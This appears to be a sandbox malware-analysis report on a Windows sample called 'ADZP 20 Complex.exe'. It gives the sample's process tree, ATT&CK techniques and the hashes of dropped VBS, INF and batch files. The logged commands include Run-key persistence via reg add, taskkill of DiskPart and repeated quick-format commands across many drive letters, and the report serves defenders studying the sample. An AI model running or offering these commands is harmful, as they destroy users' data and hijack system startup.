reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:6604

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:10368

C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:11316

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:856

C:\Windows\system32\calc.exe
calc
3⤵
PID:6816

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6952

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6948

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:6964

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4818.tmp\4828.tmp\4829.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:5936

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:10068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:10160

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9772

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:10636

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:10716

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:12008

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6304

C:\Windows\system32\calc.exe
calc
3⤵
PID:6972

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:4808

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:7008

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4930.tmp\4931.tmp\4932.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:5644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:7228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:5540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:10032

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:10228

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:10692

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:10300

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:12084

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6644

C:\Windows\system32\calc.exe
calc
3⤵
PID:7068

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7084

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7140

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:5244

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\56A8.tmp\56C8.tmp\56C9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:7456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:9328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:10076

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:10764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:6604

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:10536

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:11632

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:10372

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:13000

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4068

C:\Windows\system32\calc.exe
calc
3⤵
PID:1928

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6988

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6992

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:5004

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\69DA.tmp\69DB.tmp\69DC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:9632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:10000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:5512

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:11372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:11440

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:11580

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12216

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:12856

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:13660

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4404

C:\Windows\system32\calc.exe
calc
3⤵
PID:4400

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6196

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:1596

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:5148

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\782C.tmp\782D.tmp\783E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:9056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:10612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:11044

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:12208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:11380

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:11592

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12716

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:12824

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:14264

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5172

C:\Windows\system32\calc.exe
calc
3⤵
PID:5096

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2604

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:5200

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\73F8.tmp\73F9.tmp\73FA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:9400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:10252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:10288

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:11820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:11880

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12044

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:11952

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:13200

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:14092

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5132

C:\Windows\system32\calc.exe
calc
3⤵
PID:7200

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7212

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:7280

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8DCE.tmp\8DCF.tmp\8DD0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:10456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:11260

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:12240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:10864

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12300

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12488

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:10416

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:13964

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7300

C:\Windows\system32\calc.exe
calc
3⤵
PID:7336

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7356

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7380

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:7400

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\94B1.tmp\94B2.tmp\94B3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:10904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:11252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:11160

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:12568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:12764

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12828

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:12336

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:13440

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:14804

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7412

C:\Windows\system32\calc.exe
calc
3⤵
PID:7444

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7452

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7484

C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7496

C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
3⤵
- Views/modifies file attributes
PID:7876

C:\Windows\system32\format.com
format /y /q A:
3⤵
PID:6412

C:\Windows\system32\format.com
format /y /q B:
3⤵
PID:6340

C:\Windows\system32\format.com
format /y /q D:
3⤵
PID:2924

C:\Windows\system32\format.com
format /y /q E:
3⤵
PID:8312

C:\Windows\system32\format.com
format /y /q F:
3⤵
PID:8808

C:\Windows\system32\format.com
format /y /q G:
3⤵
PID:8316

C:\Windows\system32\format.com
format /y /q H:
3⤵
PID:3324

C:\Windows\system32\format.com
format /y /q I:
3⤵
PID:8988

C:\Windows\system32\format.com
format /y /q J:
3⤵
PID:8232

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:9248

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:9360

C:\Windows\system32\calc.exe
calc
3⤵
PID:9436

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:9552

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:9696

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:9812

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:9844

C:\Windows\system32\calc.exe
calc
3⤵
PID:9908

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:9964

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:9988

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:10092

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6516

C:\Windows\system32\calc.exe
calc
3⤵
PID:9572

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:9600

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:9656

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:9740

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:9880

C:\Windows\system32\calc.exe
calc
3⤵
PID:10116

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:10148

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:9292

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:10012

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1488

C:\Windows\system32\calc.exe
calc
3⤵
PID:5072

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:8772

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:9372

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:5508

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:9460

C:\Windows\system32\calc.exe
calc
3⤵
PID:9532

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:1792

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6508

C:\Windows\system32\format.com
format /y /q K:
3⤵
PID:12124

C:\Windows\system32\format.com
format /y /q L:
3⤵
PID:12916

C:\Windows\system32\format.com
format /y /q M:
3⤵
PID:12304

C:\Windows\system32\format.com
format /y /q N:
3⤵
PID:13428

C:\Windows\system32\format.com
format /y /q ├æ:
3⤵
PID:14328

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\258A.tmp\258B.tmp\258C.bat
Filesize
17KB

MD5
190e7cfa7d6de532ba4498ca3d38b47d

SHA1
7d4ea5ce61962c0445d955a44dd31226fa8c736e

SHA256
faee2b0ac2218435a6973b87277b29010c988efefdcd7fe0e107808c2cc0f282

SHA512
5a87b4bac67957acbc6dfab08cf9b3e1110e4b496b66110a44f7b2d0ec75b950d7569b6220c4a5ab3597db032e70b16d5a5e6ee4ab23102f6d12fea7bdc11598

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
294B

MD5
fcf045577a1cc690f46bbe3907bb7b59

SHA1
042b5af3af7f74487cf4b4e68f76dc7c580315a5

SHA256
eca615d22d42bd5d6fbe41e0dffb63ac2da5c26e78d70295dc483891906ab3b1

SHA512
f62691f495ffea77280c133de75ec38b449c1219b19e26ca2cce0e21ae03777b91a772fe14886331d243751749e7fbeb6589e372f6a10d145f1277b2feea6283

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
408B

MD5
584c76bba317f3109c2a382a6f6f6ce6

SHA1
79be7c2d77fc092d1c0c1498c05206fd71bdd295

SHA256
ab42690849dc82733a227792c9a742ba187a0b0100746f20f488d6aa2b1e9d22

SHA512
119767b22efea0fcf2c7258be242fb59912788de36082470670dd3da3b091ff4054ae7e46ab662e4ce85cd9f6117940ef58c1a65c3c7fa1e088c290279554968

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
120B

MD5
6bc9ab9854695874c5338bd08dde7db5

SHA1
8ae8dc91cd8b80dd688378a3eacb2750e2de8c3c

SHA256
d4249fbe2df7ddc684f61bbba98e5d3312c85e5787d5500a73ff18a5abce76eb

SHA512
e8fda27e7d1144816879b84fa04b8b3a7063f3841e57a1aaa918b5dfa1dc35f0f4380f89ca861c59ea45d884488e68309dabff15200e6b99038df4431e439f85

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
174B

MD5
602746969c576d76cb006952663e9db4

SHA1
26b53b7276950b28516b34e386edb304fb921288

SHA256
784273d1fe1b81d20c7bbe9bafdafdf7e24405eb5498b1a88e263e3f1caf8b06

SHA512
6265033deac74eb972a03d3c0bb9ccd338a36065b23c661a27daa86e65b6624ba2f0fcf6881c444b933b3a4d7630d93ba9d8aeb35b12e8e967ece4b9737a7032

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
234B

MD5
a3c32c1c740de28b13375dcd3614aecc

SHA1
38dd4740c6e92706fa37b8d0a28d209d7e78de87

SHA256
ea3de4f06117762acc4c35a38cd4bb045888ae361c38887df99228acf7345939

SHA512
81b8c06cbfe4b39a3719b6cccf9be9e57be705547ba577c74eb48b7c9ac206a26c560fd2d0662e979ddcc934f39c15522bf1ead4e413d18f22db8d8f6afe0d9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
60B

MD5
11aa52a7eca2cf8fdcd1584b5a8b6026

SHA1
01ae6066e6b3879cb0caf306cc91077b7c0bea1e

SHA256
8dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11

SHA512
07f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
370B

MD5
3fdd19fb2a886abcccbbb2d3253b43ea

SHA1
56f40cec4c6287084f3fe5147a929e9c6d81ab41

SHA256
005939c96c791e50f2aa446ad812e3bfeae8297fee51c7f6e543d1d6571882a3

SHA512
cdc92751c460ef659637ff239479503f13c701bddb704799e173e6b2e9ad90fd551b5cbf2dd060ecadc0f9f450e2c49656a74a9a36f7d82b919d92dca234e467

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
518B

MD5
c97422f06c77bca36a58567f0182538e

SHA1
5a026fb6b533aedc318bf7d89f839eff9c68796a

SHA256
2252affb7a2eca4c1331d50d85fa05cadd4f24c44b9dfae9b7938b47f6db9e84

SHA512
8f6cfc2a9f69404f26fc9a2d1f2c61e6015fae3b42e66a2633513c9fe9016a2eb11b5c02fe59a56c9015edb69e1d1b79f4abd85668e610e7158b5c04e31fe8de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
148B

MD5
50e2a40bc39192080a39d3088fa7aa76

SHA1
481807334d45196f752e8d35eb8f09dc9ff7b008

SHA256
6cfa1ab5a6ca16d543b4026cd3e96ad70b24b76170af8f48c189c80c61bec843

SHA512
ab19fb37e801f8cc8305745b112160b269c18fd6300ba93cf1976069c04bde4b566d9c2430bc0ecfe06c3c0efafb962da0b0a17cec43ef014bfababf36d701c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
222B

MD5
05a4d4594b598cfe885bf862787b8cde

SHA1
dfb26e156e88af25bd00db0bc788b81c521a4db9

SHA256
fd8427db8c0c5ad2c7a8fc36c18f9400e25bdd7dfd1d267ec11a7a94bdbd1cab

SHA512
ac1f87eabd69e1939f463c8710cdd1ba8a886ad6509d26d0fac4e09ab82056cf952b7a0cf2ecb55bb0549fdb0aff6457133eeb6b7b222df58f773f91df101136

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
296B

MD5
b20421aba6b1738af56e402aed7b5fca

SHA1
7b9e8f147c25a383e775cf4ce66fec5f050f8187

SHA256
2b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd

SHA512
32eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
270B

MD5
adad2cd23a8880d4b3bdb1481c5b7998

SHA1
823fc1acc3e7a3f0cffab5cb8fa453a8c0d1872c

SHA256
838ba55eb15df2e0145178a20b4d01314d0fcde04ff871649012eaeba6bbfb69

SHA512
8c600e32157daef85549d0a19a40f38e812e05cbf24e51453fa1ea94435e55fe4a705e77d42a4f63f3c565da98b4e69f1ed7bb6f3dbca65e80b17526954e60e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
324B

MD5
b260589bc116e407e75412be10ce0c7c

SHA1
b3498d228b26ad13ba76b27d624ef5eef940221c

SHA256
61bf3a4e7eb43119fb6f69c2d63872f35b9b6d79fd5a846ad824951ccea9898f

SHA512
007b78a36ea10d91360610ceec313bfa51c663c719859edf95dae0cdb75bdbbe6908bf0cb4c3f2e237539e0e20dc64266328e8a82ad5a7c90b59b6f56f683c4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
108B

MD5
aea78da25dd9a4226b49abfadcc3977c

SHA1
1ae73fa0157801a3c42074f6d057712de6427e31

SHA256
18d5c5a71bb9b2414e4a08a52eeacf10961f29c5c582964b3507896be885b3a4

SHA512
f4a2c037f59680fe9d7931866fac1d28c3006e1fbf128ff8b6cb8f3edd54b32854e3a51839f8aca9288e657ece7dd645875ef4db1160c92d1f515137fb245ada

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
162B

MD5
d5980bf4b018e4c397df95afe8941c66

SHA1
ce53c669a898d09479831bc59bc31a5fba2a6f2b

SHA256
9afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a

SHA512
c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
216B

MD5
7659392a12010d8c761cb9888f6fd5ac

SHA1
b8829c26628740b77ab7405c231f420e860d8c1f

SHA256
71bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431

SHA512
5caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
54B

MD5
888e64c554686bbbc0499057cce1af36

SHA1
5a7f51c66e3ae7dd0e0231c9817aee8c9fc54006

SHA256
616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d

SHA512
9882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
414B

MD5
873781e160d6c7a2c7100536f95e373a

SHA1
439389553b0f4b61327c0160a92e4c8ddca8f84d

SHA256
e244905c9acc529b7d7dbd58453f44dbd3f3d627bba23adcf375afde9b6b2a35

SHA512
1116b365d1e44dbad9fcdf462bb3467dbe3ab8b40a01c7dc6d516b24d2b1260c405cbda80f7a1177f89412a2db726a68e6ae2ceee839c117061ecbb75a06a4aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
483B

MD5
21321634b2c2bf8223d389be19d13d4e

SHA1
116c0af8712cc2120fbb6c4893f9a99a77242960

SHA256
fa1ddb950fadc33035dc70e015155e7db6fefaddc05d83cc1fab233e3c416f60

SHA512
feea91421292af2cb0348c6c09b2bbe810f3a3385c5b5ddbb7e6312aa7f97f48eebf10d6f9966b2fee8f4e843e87ceabf78318c9ac9b070478f0372471acce20

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
897B

MD5
c2ad111a08afc24b3b049268249f7684

SHA1
c8bb29425d2a9f2ab18e788eebcbba6ea8e72c4a

SHA256
5b27e40b2fdfcd2d7a72531ecbd822a673dfdad55b2f9b4f8238ed96c083ca18

SHA512
a6ccc4d657436925529995efbbde77127b17f887b06a3d207963bb4291e60b739719882d2a3d72fe3000d2c2b452591337932cc44929e77a9005018d98f5c97d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
1KB

MD5
4b52b9bd17e71b4ad9e6a9c490d7caac

SHA1
548af0f8fce57c4c18e161ce590a147b26bf106e

SHA256
fda7d754f369fbb3d55125abf744709397484169fe2e4cbe1a6d56f987373526

SHA512
77ff1cda418f014329bde03d34e8e3ca91748ff916a91c56baa3690711faf55a628fa2b3cfc6f9f59347111e33cdffa6b68b11b5bc601936ce75b05306a0036f

Download Submit
